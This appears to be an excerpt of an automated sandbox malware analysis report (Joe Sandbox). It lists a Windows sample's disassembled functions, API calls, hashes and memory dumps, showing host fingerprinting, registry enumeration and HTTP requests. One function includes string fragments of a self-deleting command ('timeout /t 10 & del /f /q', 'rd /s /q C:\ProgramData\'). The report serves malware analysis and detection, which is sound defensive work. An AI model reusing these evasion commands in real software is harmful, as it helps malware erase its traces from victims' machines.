                                                                                                                                                                        • Opcode Fuzzy Hash: bdf3124790010b3a7da51ad926c36c274d51d92884e09f49cb84eee557da59a0
                                                                                                                                                                        • Instruction Fuzzy Hash: A751197590192CAFDB21AF64EC85BEFBBB9EB08346F0041E5F909A6150DB705F818F90
                                                                                                                                                                        Function 00181284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001812A7
                                                                                                                                                                        • _memset.LIBCMT ref: 001812B6
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BA9EC), ref: 001812D0
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BA9F0), ref: 001812DE
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BA9F4), ref: 001812EC
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BA9F8), ref: 001812FA
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BA9FC), ref: 00181308
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA00), ref: 00181316
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA04), ref: 00181324
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA08), ref: 00181332
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA0C), ref: 00181340
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA10), ref: 0018134E
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA14), ref: 0018135C
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA18), ref: 0018136A
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001BAA1C), ref: 00181378
                                                                                                                                                                          • Part of subcall function 00190C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
                                                                                                                                                                          • Part of subcall function 00190C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
                                                                                                                                                                          • Part of subcall function 00190C5A: GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 001813E3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1553874529-0
                                                                                                                                                                        • Opcode ID: 1d8ffee69d79e0a0dcd36f12862e7359c553399be845f5325d5407c81abc70d1
                                                                                                                                                                        • Instruction ID: 0083012a229e6790008487b1b3cc42bf4a7ccef82aeb111bacb4e742c76c6fb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 1d8ffee69d79e0a0dcd36f12862e7359c553399be845f5325d5407c81abc70d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5E4154B6D0422C77CB20ABB18C59FDB7BACAF15760F900591E999E3041D774AB89CF90
                                                                                                                                                                        Function 001911D8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,001B670E,00000000,?,?), ref: 00191248
                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00191285
                                                                                                                                                                        • wsprintfA.USER32 ref: 001912B2
                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 001912D1
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00191307
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0019131C
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,001B6E94), ref: 001913B1
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0019141B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0019143B
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00191447
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                                        • API String ID: 2394436309-3278919252
                                                                                                                                                                        • Opcode ID: 43222b2c89ed64c7e449c4f1a21dc1b8a52f6a40ec5795af0ec5fb81b9f95eef
                                                                                                                                                                        • Instruction ID: ed0ffa347c40a2a681eec8d2fd8520ef091591f217b401ea7ac364c8994a7962
                                                                                                                                                                        • Opcode Fuzzy Hash: 43222b2c89ed64c7e449c4f1a21dc1b8a52f6a40ec5795af0ec5fb81b9f95eef
                                                                                                                                                                        • Instruction Fuzzy Hash: 8661A47590012C9BEF22EB14ED84EDABBB8EB59704F1086E6E509A6111DF30AEC5CF50
                                                                                                                                                                        Function 001982B3 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 001982D8
                                                                                                                                                                        • _memset.LIBCMT ref: 001982E7
                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 001982FC
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00198498
                                                                                                                                                                        • _memset.LIBCMT ref: 001984A7
                                                                                                                                                                        • _memset.LIBCMT ref: 001984B9
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 001984C9
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                        Strings
                                                                                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 00198327
                                                                                                                                                                        • " & exit, xrefs: 0019841C
                                                                                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00198375
                                                                                                                                                                        • " & exit, xrefs: 001983CB
                                                                                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 001983D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                        • API String ID: 2823247455-1079830800
                                                                                                                                                                        • Opcode ID: 60948c7921418fca2aef70d742cd3f695e49306cfc5a969c72455953f0eac02c
                                                                                                                                                                        • Instruction ID: 3812c79d959323432940628104a9dd717a34a0e429ea05cad779e153ff2b32af
                                                                                                                                                                        • Opcode Fuzzy Hash: 60948c7921418fca2aef70d742cd3f695e49306cfc5a969c72455953f0eac02c
                                                                                                                                                                        • Instruction Fuzzy Hash: BC51A5B1D402299BDF22EF64DC81ADDB7BCEB18704F4240E5A618B7152DB706F868F54
                                                                                                                                                                        Function 00190977 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 001909AA
                                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001909EA
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00190A3F
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00190A46
                                                                                                                                                                        • wsprintfA.USER32 ref: 00190A7C
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,001B6E44), ref: 00190A8B
                                                                                                                                                                          • Part of subcall function 00191659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 00191659: _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00190AA2
                                                                                                                                                                          • Part of subcall function 001923AA: malloc.MSVCRT ref: 001923AF
                                                                                                                                                                          • Part of subcall function 001923AA: strncpy.MSVCRT ref: 001923C0
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00190AC5
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                        • String ID: :\$C$QuBi
                                                                                                                                                                        • API String ID: 1856320939-239756005
                                                                                                                                                                        • Opcode ID: c7f50d0b37c49aa5d96b22e4307c66c166b619410a60999605eee9dd274a47da
                                                                                                                                                                        • Instruction ID: 9b70dc3a3d9c1ed2989dab06057fa0f20f228d91542261ea346a2b6b61a744a3
                                                                                                                                                                        • Opcode Fuzzy Hash: c7f50d0b37c49aa5d96b22e4307c66c166b619410a60999605eee9dd274a47da
                                                                                                                                                                        • Instruction Fuzzy Hash: 62416E719452289BCB16AF789C85ADEBBBCEF19304F0000E6F549E7111D7708F958F91
                                                                                                                                                                        Function 00196908 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00186963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
                                                                                                                                                                          • Part of subcall function 00186963: StrCmpCA.SHLWAPI(?), ref: 001869DF
                                                                                                                                                                          • Part of subcall function 00186963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
                                                                                                                                                                          • Part of subcall function 00186963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
                                                                                                                                                                          • Part of subcall function 00186963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
                                                                                                                                                                          • Part of subcall function 00186963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
                                                                                                                                                                          • Part of subcall function 00186963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0019695C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00196967
                                                                                                                                                                          • Part of subcall function 00191DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00196973,?), ref: 00191E0C
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0019697C
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 0019698B
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 001969A4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                        • API String ID: 4174444224-1526165396
                                                                                                                                                                        • Opcode ID: 1c3bd6ac4ef41956937a902ddb009b3509decb157d4b6cffb7b397c4212c3e18
                                                                                                                                                                        • Instruction ID: 225f49f6d775fdf8d59101fed4700aaca18f976a09e8bfd70fdf5857c4e94c29
